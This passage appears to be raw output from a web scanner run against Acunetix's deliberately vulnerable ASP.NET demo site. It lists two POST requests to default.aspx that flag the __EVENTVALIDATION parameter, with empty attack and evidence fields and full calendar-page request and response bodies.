style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8468&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBA5zkxINsIZGRkauDThufc0PrKo6bJw%2F7af9qRhrw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLvrOGZDALRp67yDgLQp%2BbjBwLcy%2BvqAgLcy%2BvqAgLcy9%2FTDwLcy9%2FTDwLcy%2FP2CALcy%2FP2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK%2BaMFAor5owUCivnX2QkCivnX2QkCivnL%2FAICivnL%2FAICivn%2FkwoCivn%2FkwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O%2F1QMCv5O%2F1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ2F1%2BpUPb7DU43m%2BGgIMdKnDOLfI%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:16:17 GMT Content-Length: 12504
Response Body - size: 12,504 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmebnGdsIHgJTRBYBBgBA5zkxINsIZGRkauDThufc0PrKo6bJw/7af9qRhrw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLvrOGZDALRp67yDgLQp+bjBwLcy+vqAgLcy+vqAgLcy9/TDwLcy9/TDwLcy/P2CALcy/P2CAKx0t2fCgKx0t2fCgKx0vGyAwKx0vGyAwKx0uXJDAKx0uXJDAKx0pnsBQKx0pnsBQKx0o2DDQKx0o2DDQKx0qGmBgKx0qGmBgKx0tX6DwKx0tX6DwKx0smRBwKx0smRBwKx0r35BQKx0r35BQKx0tGdDQKx0tGdDQKK+aMFAor5owUCivnX2QkCivnX2QkCivnL/AICivnL/AICivn/kwoCivn/kwoCivmTtgMCivmTtgMCivmHzQwCivmHzQwCivm74AUCivm74AUCivmvhw0Civmvhw0CivmD7AsCivmD7AsCivm3gwMCivm3gwMCv5PjxAkCv5PjxAkCv5OXmwECv5OXmwECv5OLvgoCv5OLvgoCv5O/1QMCv5O/1QMCv5PT6QwCv5PT6QwCv5PHjAQCv5PHjAQCv5P7ow0Cv5P7ow0Cv5PvxgYCv5PvxgYCv5PDrwMCv5PDrwMCv5P3wgwCv5P3wgwCkLrB6w8CkLrB6w8CkLr1jgcCkLr1jgcCkLrpJQKQuuklApC6nfgJApC6nfgJApC6sZ8BApC6sZ8BApC6pbIKApC6pbIKApC62dYDApC62dYDApC6ze0MApC6ze0MApC6odUJApC6odUJ2F1+pUPb7DU43m+GgIMdKnDOLfI=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">March 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:White" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8471')" style="color:Black" title="March 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8472')" style="color:Black" title="March 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8473')" style="color:Black" title="March 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8474')" style="color:Black" title="March 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8475')" style="color:Black" title="March 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8476')" style="color:Black" title="March 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8477')" style="color:Black" title="March 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8478')" style="color:Black" title="March 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8479')" style="color:Black" title="March 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8480')" style="color:Black" title="March 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8481')" style="color:Black" title="March 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8482')" style="color:Black" title="March 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8483')" style="color:Black" title="March 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8484')" style="color:Black" title="March 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8348&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBAVVjlwdoIZGRkWZ7RPrxOp818vdHR8sKGilnHEXo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLW0szhCgLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA797vhEDwH5NrJVqrpFfWAIoYA8R
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:05:50 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBAVVjlwdoIZGRkWZ7RPrxOp818vdHR8sKGilnHEXo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLW0szhCgLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA797vhEDwH5NrJVqrpFfWAIoYA8R" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:White" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for 